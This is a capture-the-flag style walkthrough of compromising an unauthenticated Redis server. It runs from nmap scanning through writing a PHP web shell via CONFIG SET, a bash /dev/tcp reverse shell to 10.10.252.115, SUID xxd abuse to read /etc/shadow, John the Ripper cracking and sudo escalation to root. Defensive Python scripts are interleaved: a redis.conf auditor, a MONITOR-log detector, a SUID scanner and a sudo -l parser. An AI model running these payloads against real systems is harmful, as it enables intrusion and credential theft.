In this scenario, our target is Redis, one of the structured databases. We will show you how to plan an attack with a methodical approach.
Redis (Remote Dictionary Server) is an open-source, in-memory data structure store that can be used as a database, cache, and message broker. The systems we encounter are often closely tied to a database, and many system vulnerabilities are found in the services connected to that database.
You can also add this resource to your list as a guide: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
In this article, you may sometimes see different IPs and machines such as Kali or Ubuntu, because the machine connection is lost. We will also switch between machines to use different tools. Ignore these and just follow the methodology.
You can run all processes only on Kali.
Let’s start the attack scenario, punks!
People who have read the previous articles already know what we are going to do. Record the values you will use in the attack as shell variables.
For more wordlists, you can browse to /usr/share/wordlists on your machine.
Ping your target.
Register your target in your local DNS; to do this, add the IP value to the /etc/hosts file.
Ping it to check.
We are ready to discover!
Let’s discover the contents, versions and system information of the target network using our Nmap tool: nmap -sV -sC -oN nmap_result.txt -Pn --min-rate 1000 -T4 -p- -A $target_ip
-sV (Service Version Detection): probes open ports to determine what service and version are running.
-sC (Default Scripts): enables the default set of nmap scripts, which perform tasks such as version detection and basic vulnerability checks.
-oN nmap_result.txt (Output to Normal File): saves the scan results in normal output format to the specified file (nmap_result.txt).
-Pn (No Ping): disables host discovery; nmap will not ping the target hosts before scanning. Useful for hosts that do not respond to ICMP ping requests.
--min-rate 1000 (Minimum Rate): makes nmap send packets at a minimum rate of 1000 per second, which can speed up the scan significantly, especially for large scans.
-T4 (Timing Template): sets timing template 4 (Aggressive), which speeds up the scan by reducing the wait times between probe transmissions.
-p- (Scan All Ports): scans all 65,535 TCP ports.
-A (Aggressive Scan Options): enables OS detection, version detection, script scanning, and traceroute.
This process will take time as it scans all ports. You must be patient.
As you can see, there is an open port that is not normally expected and that you will not see unless you specifically perform a full port scan. Ports 80 (HTTP) and 6379 (Redis) are in use on the target. We can build attack scenarios around these.
There are also advisory notes along with some version information. You can conduct exploit research on versions and investigate existing attack methods.
Apache 2.4.18
Redis 6.0.7
It’s time to take a look at the application running on HTTP.
You may choose to conduct a directory search to obtain hidden pages. Before that, we will focus on Redis.
Let’s run another nmap script: nmap --script redis-info -sV -p 6379 -oN redis_nmap.txt $target_ip
We can interact with the service using the tools offered under “redis-tools”. Install them with sudo apt-get install redis-tools
When working on a new tool, be sure to pay attention to additional parameters and features. You can check https://auth0.com/blog/introduction-to-redis-install-cli-commands-and-data-types/
For more parameters: https://redis.io/docs/latest/develop/connect/cli/
Now use redis-cli -h $target_ip --insecure
We’ve got the connection; now let’s gather some general information. Use the info command via Redis.
Redis can be configured to enhance security by requiring authentication, either through a simple password or a combination of username and password. By default, Redis does not require any authentication, which means it can be accessed without credentials. However, for production environments, it’s important to configure authentication to prevent unauthorized access. In our case Redis can be accessed without any credentials.
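The authentication and exposure settings described above all live in redis.conf. The following audit script is an added example and is not part of the original post: it parses a configuration file and reports the conditions that made this scenario possible (no requirepass, protected-mode off, binding to every interface, and the CONFIG command left enabled). Both configurations it checks are constructed samples, not the target's file, and the script only looks at requirepass, not at Redis 6+ ACL user directives.

```python
"""Audit a redis.conf for the settings that made the scenario above possible.

Added example (not from the original post).  It reads a configuration file,
so it runs offline; the two sample configs below are constructed, not taken
from the target.  Only requirepass is checked for authentication; ACL
"user" directives (Redis 6+) are out of scope here.
"""
import shlex

# Constructed sample: an out-of-the-box style config with no authentication.
WEAK_CONF = """
# Redis configuration (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
dir /home/vianka/redis-stable
"""

# Constructed sample: the same instance hardened.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "correct horse battery staple"
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Return a list of (directive, args) pairs, ignoring comments and blanks.

    Directives may repeat (rename-command, for example), so a list is used
    rather than a dict.  Values are split with shell-style quoting, which is
    how redis.conf quotes strings.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_redis_config(text):
    """Return a list of finding codes for the weaknesses seen in this scenario."""
    directives, renamed = {}, set()
    for name, args in parse_redis_conf(text):
        if name == "rename-command" and len(args) == 2:
            renamed.add(args[0].upper())
        else:
            directives[name] = args

    findings = []

    # No password at all: anyone who can reach 6379 is an administrator.
    password = directives.get("requirepass")
    if not password or not password[0]:
        findings.append("NO_AUTH: requirepass is not set")

    # protected-mode yes refuses remote clients when no bind/password is set.
    if directives.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("PROTECTED_MODE_OFF: protected-mode is not yes")

    # Listening on every interface (or no bind line at all) exposes the port.
    bind = directives.get("bind")
    if bind is None or any(addr in ("0.0.0.0", "*", "::") for addr in bind):
        findings.append("BIND_ALL: Redis listens on all interfaces")

    # CONFIG SET dir/dbfilename is the primitive used to write files to disk.
    if "CONFIG" not in renamed:
        findings.append("CONFIG_EXPOSED: CONFIG command is not renamed/disabled")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit_redis_config(conf) or ['no findings']}")
```

Run it against a copy of the server's redis.conf; an empty result means the four conditions above are all covered, which is the baseline any internet-reachable or multi-tenant Redis should meet.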
We have a potential username, vianka. You can see it in the following parameters of the output:
executable: /home/vianka/redis-stable/src/redis-server
config_file: /home/vianka/redis-stable/redis.conf
List the connected clients with client list
Check the configuration with CONFIG GET *
Get all the “keys” with KEYS *
In the light of the information we have obtained, we can attempt RCE (Remote Code Execution).
To automate it further, you can install https://github.com/n0b0dyCN/redis-rogue-server on your system, but here we prefer to do it by hand through a PHP file.
Let’s do these one by one.
The sequence of commands shown is an example of a remote code execution (RCE) attack against a Redis server that has been configured insecurely. In this scenario, we abuse the Redis server’s configuration to write arbitrary files to the file system, which can allow malicious code to be executed.
config set dir: changes the directory where Redis will save its database files to the web root directory of an Nginx server.
config set dbfilename: changes the name of the database file.
set test: creates a key (test) in the Redis database whose value is a PHP script.
Check it.
We need to go one step further and turn the same process into a structure where we can run commands. Use <?php system($_GET['cmd']); ?>
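The chain just described (CONFIG SET dir, CONFIG SET dbfilename, SET with a PHP body, then a save) is easy to recognise on the server side. The detector below is an added example, not part of the original post: it reads Redis MONITOR output, keeps per-client state, and raises an alert when the dump location is retargeted into a web root or given a script extension, and again when that client triggers SAVE. The MONITOR lines it parses are constructed to resemble this scenario; they were not captured from the target.

```python
"""Spot the CONFIG SET dir / CONFIG SET dbfilename / SET / SAVE chain in
Redis MONITOR output.

Added example, not part of the original post.  The lines in SAMPLE_MONITOR
are constructed in the MONITOR format (timestamp, [db client], quoted args)
and were not captured from the target.
"""
import re
import shlex

SAMPLE_MONITOR = """\
1718000000.100000 [0 10.0.0.5:40001] "SET" "session:42" "abc"
1718000000.200000 [0 10.0.0.5:40001] "GET" "session:42"
1718000001.000000 [0 10.10.252.115:51234] "INFO"
1718000002.000000 [0 10.10.252.115:51234] "CONFIG" "SET" "dir" "/var/www/html"
1718000003.000000 [0 10.10.252.115:51234] "CONFIG" "SET" "dbfilename" "redis.php"
1718000004.000000 [0 10.10.252.115:51234] "SET" "test" "<?php system($_GET['cmd']); ?>"
1718000005.000000 [0 10.10.252.115:51234] "SAVE"
"""

LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<cmd>.*)$")

# Where an RDB dump should never be written, and what it should never be called.
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx")
SCRIPT_EXTS = (".php", ".jsp", ".sh")


def parse_monitor_line(line):
    """Split one MONITOR line into its timestamp, client address and argv."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "args": shlex.split(m.group("cmd"))}


def _alert(stage, ev, st):
    """Build an alert record that snapshots the client's current state."""
    return {"stage": stage, "client": ev["client"], "ts": ev["ts"], **st}


def detect_dump_to_disk_abuse(monitor_text):
    """Return one alert per suspicious step, attributed to the issuing client.

    State is kept per client connection: retargeting the dump directory into a
    web root or giving the dump file a script extension raises a "retarget"
    alert; a SET whose value contains a PHP open tag is remembered; SAVE or
    BGSAVE after a retarget raises a "dump" alert carrying the whole picture.
    """
    state, alerts = {}, []
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args = ev["args"]
        cmd = args[0].upper()
        st = state.setdefault(ev["client"],
                              {"dir": None, "dbfilename": None, "script_payload": False})

        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key, value = args[2].lower(), args[3]
            if key == "dir" and value.startswith(WEB_ROOTS):
                st["dir"] = value
                alerts.append(_alert("retarget", ev, st))
            elif key == "dbfilename" and value.lower().endswith(SCRIPT_EXTS):
                st["dbfilename"] = value
                alerts.append(_alert("retarget", ev, st))
        elif cmd == "SET" and len(args) >= 3 and "<?" in args[2]:
            st["script_payload"] = True
        elif cmd in ("SAVE", "BGSAVE") and (st["dir"] or st["dbfilename"]):
            alerts.append(_alert("dump", ev, st))
    return alerts


if __name__ == "__main__":
    for a in detect_dump_to_disk_abuse(SAMPLE_MONITOR):
        print(a)
```

The "retarget" alert is raised before any SAVE because Redis also writes dumps on its own schedule (the save directives), so a changed dir or dbfilename is worth acting on by itself. MONITOR is expensive on a busy instance; in production the same logic fits better over a proxy log or an eBPF capture of the RESP stream.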
Let’s check the RCE. Pay attention to the commands we define via the URL.
Now get the reverse shell with a new command you define, either via the URL or via Redis.
We will use "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.10.252.115/12444 0>&1'\"); ?>"
Let’s put our machine in listening mode via the port we specified: nc -nlvp 12444
Then just browse 10.10.239.33/redis.php
We got that!
Let’s see what “vianka” has in store.
Let’s check the version in the system: lsb_release -a
We need to look at what privileges we have.
We tried to read /etc/shadow, but with no result.
Let’s do a test on binary vulnerabilities and check if “xxd” is available. You should check out this location /usr/bin
Yes, we have it.
xxd is a command-line utility in Unix-like operating systems that is used for creating a hex dump of a given file or standard input. It can also be used to reverse the operation and convert a hex dump back into its original binary form.
Check out what approaches you can try from this resource: https://gtfobins.github.io/gtfobins/xxd/
SUID (Set User ID) is a special type of file permission given to a file in Unix-like operating systems. When a file with the SUID bit set is executed, it runs with the privileges of the file’s owner, rather than the privileges of the user who is running the file. This can be useful for allowing normal users to execute programs with elevated privileges.
We can read a file as root, as the file has the SUID bit set. Let’s try it.
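A non-standard SUID-root binary such as xxd is exactly what a host baseline check should surface before an attacker does. The script below is an added example and is not part of the original post: it lists set-user-ID root files and diffs them against a baseline of programs expected to carry that bit. The baseline set and the sample stat entries are illustrative assumptions, not data from the target; a real baseline should be generated from a freshly provisioned image of your own.

```python
"""List set-user-ID root binaries and diff them against a known-good baseline.

Added example, not from the original post.  find_suid_entries() works on
(path, mode, uid) tuples so it can be tested on the constructed sample
below; scan_directory() feeds it real os.lstat() results.
"""
import os
import stat

# Illustrative assumption: SUID-root programs expected on a stock Ubuntu box.
# Derive the real baseline from a clean image of your own.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd",
}

# Constructed sample resembling the scenario: xxd has been made SUID root.
SAMPLE_ENTRIES = [
    ("/usr/bin/sudo",   0o104755, 0),     # SUID root, expected
    ("/usr/bin/passwd", 0o104755, 0),     # SUID root, expected
    ("/usr/bin/xxd",    0o104755, 0),     # SUID root, NOT in baseline
    ("/usr/bin/ls",     0o100755, 0),     # plain root-owned binary
    ("/usr/bin/foo",    0o104755, 1000),  # SUID but owned by a normal user
]


def find_suid_entries(entries, root_only=True):
    """Return paths of regular files whose mode carries the SUID bit.

    With root_only=True (the default) only root-owned files count, since those
    are the ones that hand out uid 0 when executed.
    """
    out = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):
            continue
        if mode & stat.S_ISUID and (uid == 0 or not root_only):
            out.append(path)
    return out


def unexpected_suid(entries, baseline=BASELINE):
    """SUID-root paths that are not in the baseline, sorted for stable output."""
    return sorted(set(find_suid_entries(entries)) - baseline)


def scan_directory(top):
    """Collect (path, mode, uid) for every file under `top` without following symlinks."""
    entries = []
    for dirpath, _, files in os.walk(top):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            entries.append((path, st.st_mode, st.st_uid))
    return entries


if __name__ == "__main__":
    for path in unexpected_suid(scan_directory("/usr/bin")):
        print("unexpected SUID root binary:", path)
```

Running the scan over /usr/bin, /usr/sbin, /bin and /sbin on a schedule and alerting on any new entry catches both deliberate misconfiguration and packages that quietly ship a SUID helper.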
Stabilize the shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
Now we have achieved what we wanted!
We need to find out which hash format it is.
We have a password hash in SHA-512 crypt format. Save it to a local file named johnhashtarget
We will use the john tool to crack it: john --wordlist=/usr/share/wordlists/rockyou.txt johnhashtarget
You get the password bea****.
Now we can switch user with the su vianka command.
This output is from the sudo configuration file (/etc/sudoers) on an Ubuntu system. It provides information about the default settings and permissions granted to the user vianka for running commands with elevated privileges using sudo.
Matching Defaults entries for vianka on ubuntu:
env_reset: resets environment variables to a default state when running sudo commands.
mail_badpass: sends an email to the mail administrator if a user enters an incorrect password.
secure_path: sets the PATH environment variable for sudo commands to a secure list of directories, which prevents potentially malicious programs from being run accidentally.
User vianka may run the following commands on ubuntu:
(ALL : ALL) ALL: This specifies the permissions granted to the user vianka when using sudo. Specifically:
ALL indicates that vianka can run commands as any user.
ALL indicates that vianka can run commands on any host.
ALL indicates that vianka can run any command.
Now it’s time to become root with the sudo su command.
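The sudo -l output interpreted above has a regular shape, so the same review can be automated across a fleet of hosts. The parser below is an added example, not part of the original post: it extracts the user, host and each rule line, and flags a full (ALL : ALL) ALL grant or any NOPASSWD rule. The sample output it parses is constructed (the second rule line is an invented example), not the target's actual sudo -l output.

```python
"""Parse `sudo -l` output and flag rules a reviewer would want to see.

Added example, not from the original post.  SAMPLE_SUDO_L is constructed to
match the format quoted in the article; the second rule is invented to show a
NOPASSWD entry and does not come from the target.
"""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for vianka on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User vianka may run the following commands on ubuntu:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart redis
"""

HEADER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):$")

# "(runas_user [: runas_group]) [TAG: ...] command"
ENTRY_RE = re.compile(
    r"^\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudo_l(text):
    """Return (user, host, rules) from `sudo -l` output.

    Only lines after the "User X may run ..." header are treated as rules; the
    Defaults block above it is skipped.
    """
    user = host = None
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:
            user, host = m.groups()
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = ENTRY_RE.match(line)
        if m:
            rules.append({
                "runas_user": m.group("user").strip(),
                "runas_group": (m.group("group") or "").strip() or None,
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "command": m.group("cmd").strip(),
            })
    return user, host, rules


def assess_rules(rules):
    """Return review findings: unrestricted root, then password-less commands."""
    findings = []
    for rule in rules:
        if rule["runas_user"] == "ALL" and rule["command"] == "ALL":
            findings.append("FULL_ROOT: any command as any user")
        elif rule["nopasswd"]:
            findings.append(f"NOPASSWD: {rule['command']} as {rule['runas_user']}")
    return findings


if __name__ == "__main__":
    user, host, rules = parse_sudo_l(SAMPLE_SUDO_L)
    print(f"{user}@{host}:")
    for finding in assess_rules(rules):
        print(" ", finding)
```

Feed it the output of sudo -l collected by your configuration management, and treat any FULL_ROOT finding for a service account (here the same account that runs Redis) as a misconfiguration to fix, since it turns a single application compromise into a root compromise.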
That is it!
Don’t give up on hacking.
Code for good.
^-^